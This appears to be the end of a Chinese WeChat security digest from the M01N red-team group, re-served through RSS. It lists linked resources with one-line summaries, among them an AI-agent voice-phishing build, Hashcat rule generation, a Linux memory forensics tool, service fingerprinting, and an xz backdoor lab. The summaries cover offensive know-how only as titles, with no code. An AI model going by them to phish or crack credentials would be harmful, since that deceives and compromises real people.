2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">社工钓鱼</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍使用自主对话AI代理构建语音钓鱼(vishing)系统的技术实现，包含真实案例演示</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.reversec.com/posts/2026/02/building-an-ai-vishing-solution-in-7-days/" target="_blank">https://labs.reversec.com/posts/2026/02/building-an-ai-vishing-solution-in-7-days/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Hashcat密码破解规则生成的方法论和工具技巧</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://jakewnuk.com/posts/making-the-hashcracky-hashcat-rules/" target="_blank">https://jakewnuk.com/posts/making-the-hashcracky-hashcat-rules/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nemesis 2.2发布，新增大容器处理、数据处理代理、增强DPAPI支持和性能改进等功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://specterops.io/blog/2026/02/25/nemesis-2-2/" target="_blank">https://specterops.io/blog/2026/02/25/nemesis-2-2/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">mquire：无需外部依赖的Linux内存取证工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/trailofbits/mquire" target="_blank">https://github.com/trailofbits/mquire</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">nerva：快速服务指纹识别CLI工具，支持120多种TCP/UDP/SCTP协议</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/praetorian-inc/nerva" target="_blank">https://github.com/praetorian-inc/nerva</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Gibson：网络监控工具，可映射进程到网络连接、识别云服务商、检测信标活动</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/HackingLZ/gibson" target="_blank">https://github.com/HackingLZ/gibson</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关于Pwn2Own黑客竞赛的纪录片，探讨Mozilla如何处理0day漏洞披露</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.youtube.com/watch?v=YQEq5s4SRxY" target="_blank">https://www.youtube.com/watch?v=YQEq5s4SRxY</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">回顾xz后门事件，讨论Linux安全威胁，并介绍包含xz后门的恶意软件Lab环境</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.youtube.com/watch?v=aoag03mSuXQ" target="_blank">https://www.youtube.com/watch?v=aoag03mSuXQ</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011095" src="https://wechat2rss.xlab.app/img-proxy/?k=e2058f16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnyeibajF4zmVJbTx3G5cSzR3LYsQibZWWgwMq7hOxibCazLOkbMROyWScKmtoETqIsuEEQPFTqHrR7Qa8aq2y1s1o2GDZLaB5524%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011096" data-ratio="0.9145907473309609" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="562" src="https://wechat2rss.xlab.app/img-proxy/?k=a30df5e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmt122FhnKibelo2aicEYSquQsia9kXIkiagpGF6ibmX08YDcVXPPIsVH26X4DxM3YPYiayYGSe2DpzuJWnQmOjUvLtAf9dt0oJXPfrg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494720&amp;idx=1&amp;sn=82df42a422757d53c5053087f96dc2b1&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.7-2026.2.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.7-2026.2.27）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494679&amp;idx=1&amp;sn=d41cda123693d36a363a9dc35c43bdb4&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.1.31-2026.2.6）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.1.31-2026.2.6）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494671&amp;idx=1&amp;sn=ea47d2c5e0669f117aa653c5ee762b95&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.1.24-2026.1.30）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.1.24-2026.1.30）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=96139f45&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494746%26idx%3D1%26sn%3D9dea57e1f5651252cff076bd01d30209">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 06 Mar 2026 18:07:00 +0800</pubDate>
    </item>
  </channel>
</rss>